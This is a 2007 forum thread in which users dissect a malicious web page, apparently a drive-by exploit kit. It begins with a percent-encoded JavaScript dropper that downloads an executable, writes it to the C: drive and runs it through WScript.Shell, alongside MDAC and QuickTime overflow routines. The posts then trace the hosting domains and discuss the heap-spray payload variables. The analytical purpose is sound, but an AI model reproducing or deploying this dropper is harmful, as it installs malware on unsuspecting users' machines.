3%74%28%61%2c%20%22%4d%69%63%72%6f%73%6f%66%74%2e%58%4d%4c%48%54%54%50%22%29%3b%0a%09%09%09%09%69%66 %20%28%21%20%76%5b%30%5d%29%20%76%5b%30%5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%61%2c%20% 22%4d%53%58%4d%4c%32%2e%53%65%72%76%65%72%58%4d%4c%48%54%54%50%22%29%3b%0a%09%09%09%7d%0a%0a%09%09%0 9%69%66%20%28%21%20%76%5b%31%5d%29%20%7b%0a%09%09%09%09%76%5b%31%5d%20%3d%20%43%72%65%61%74%65%4f%62 %6a%65%63%74%28%61%2c%20%22%41%44%4f%44%42%2e%53%74%72%65%61%6d%22%29%3b%0a%09%09%09%7d%0a%0a%09%09% 09%69%66%20%28%21%20%76%5b%32%5d%29%20%7b%0a%09%09%09%09%76%5b%32%5d%20%3d%20%43%72%65%61%74%65%4f%6 2%6a%65%63%74%28%61%2c%20%22%57%53%63%72%69%70%74%2e%53%68%65%6c%6c%22%29%3b%0a%09%09%09%09%69%66%20 %28%21%20%76%5b%32%5d%29%20%7b%0a%09%09%09%09%09%76%5b%32%5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65% 63%74%28%61%2c%20%22%53%68%65%6c%6c%2e%41%70%70%6c%69%63%61%74%69%6f%6e%22%29%3b%0a%09%09%09%09%09%6 9%66%20%28%76%5b%32%5d%29%20%6e%3d%31%3b%0a%09%09%09%09%7d%0a%09%09%09%7d%0a%09%09%7d%0a%0a%09%09%69 %2b%2b%3b%0a%09%7d%0a%0a%09%69%66%20%28%76%5b%30%5d%20%26%26%20%76%5b%31%5d%20%26%26%20%76%5b%32%5d% 29%20%7b%0a%09%09%76%61%72%20%64%61%74%61%20%3d%20%58%4d%4c%48%74%74%70%44%6f%77%6e%6c%6f%61%64%28%7 6%5b%30%5d%2c%20%75%72%6c%52%65%61%6c%45%78%65%29%3b%0a%09%09%69%66%20%28%64%61%74%61%20%21%3d%20%30 %29%20%7b%0a%09%09%09%76%61%72%20%6e%61%6d%65%20%3d%20%22%63%3a%5c%5c%73%79%73%22%2b%47%65%74%52%61% 6e%64%53%74%72%69%6e%67%28%34%29%2b%22%2e%65%78%65%22%3b%0a%09%09%09%69%66%20%28%41%44%4f%42%44%53%7 4%72%65%61%6d%53%61%76%65%28%76%5b%31%5d%2c%20%6e%61%6d%65%2c%20%64%61%74%61%29%20%3d%3d%20%31%29%20 %7b%0a%09%09%09%09%69%66%20%28%53%68%65%6c%6c%45%78%65%63%75%74%65%28%76%5b%32%5d%2c%20%6e%61%6d%65% 2c%20%6e%29%20%3d%3d%20%31%29%20%7b%0a%09%09%09%09%09%72%65%74%3d%31%3b%0a%09%09%09%09%7d%0a%09%09%0 9%7d%0a%09%09%7d%0a%09%7d%0a%0a%09%72%65%74%75%72%6e%20%72%65%74%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f %6e%20%73%74%61%72%74%28%29%20%7b%0a%0a%09%69%66%20%28%21%20%4d%44%41%43%28%29%20%29%20%7b%20%73%74% 61%72%74%4f%76%65%72%66%6c%6f%77%28%30%29%3b%20%7d%0a%0a%7d%0a%0a%73%74%61%72%74%20%28%29%3b%0a%0a%3 c%2f%73%63%72%69%70%74%3e%0a%3c%2f%62%6f%64%79%3e%0a%3c%2f%68%74%6d%6c%3e%0a%0a%0a');

 



document.write (SB);

The 'obfuscation' is a simple escape manipulation

The first unescaped code

Code:

Some investigation about the links used into the script:
http://foo.address1.com/bar/ gives a 404 error code (Apache 1.3)
http://foo.address1.com gives a 502 error code (nginx)
http://address1.com gives a hello world

Whois query returns that this server is from the hosting company.

Let's continue with the one hosting the .qtl file
http://address2.com/tXlwpKDL/uCfIXrUcVpycMkVj.qtl

The qtl file format is a QuickTime Media File, here is his MIME type
application/x-quicktimeplayer
video/x-quicktimeplayer

Let's google it,
http://projects.info-pull.com/moab/MOAB-01-01-2007.html

Quote:

an attacker could overflow a stack-based buffer [...] leading to an exploitable remote arbitrary code execution condition.

I made a little archive.
The code is not dangerous as is but still I respect the rules.
Me code write good..

MALWARE/BIOHAZARD
pass: malware

LLXX

11-10-2007, 02:23 AM

Nothing easier than having the source code to analyze

Quote:

With some research I determined it to be some chinese stuff, here is the translation that Google gave me, maybe someone could explain it, please ?

Read the code, notice the following:

- payLoadCode
- heapBlockSize
- payLoadSize = payLoadCode.length * 2
- 0x400000

NOW ask yourself why you would ever think it's "some chinese stuff"

Silkut

11-10-2007, 02:48 AM

Hi and thanks for your answer LLXX,
It is maybe idiot but I thought it was chinese while I unescaped the value of payLoadCode.

Maybe there is a problem with this forum, as I put the escaped version of payLoadCode it was automatically translated to some char I can't read (probably because I don't have the font char), Same thing with the google translated part I have little upside down vertices, here is what I see:

LLXX

11-10-2007, 03:19 AM

Yes, because they're not valid characters in any Chinese encoding either

Hexdump? I'm quite sure this forum handles 0123456789abcdef just fine.

Silkut

11-10-2007, 04:47 AM

No look,
The payLoadCode value is a concatenation of escaped strings. I unescaped them and it gave me pipe char strings showing me I did not had the correct font char, I went on google and translated those things, it apparead to show some chinese name, now I don't know if it means it's from chinese or if it's only code.
What I meant with the image is that I copy/pasted the escaped version originally found in the code, and the forum transformed them into those upside down vertices.
Anyway thanks for your answer, there is no misteries about that code anymore.

vBulletin® v3.7.2, Copyright ©2000-2008, Jelsoft Enterprises Ltd.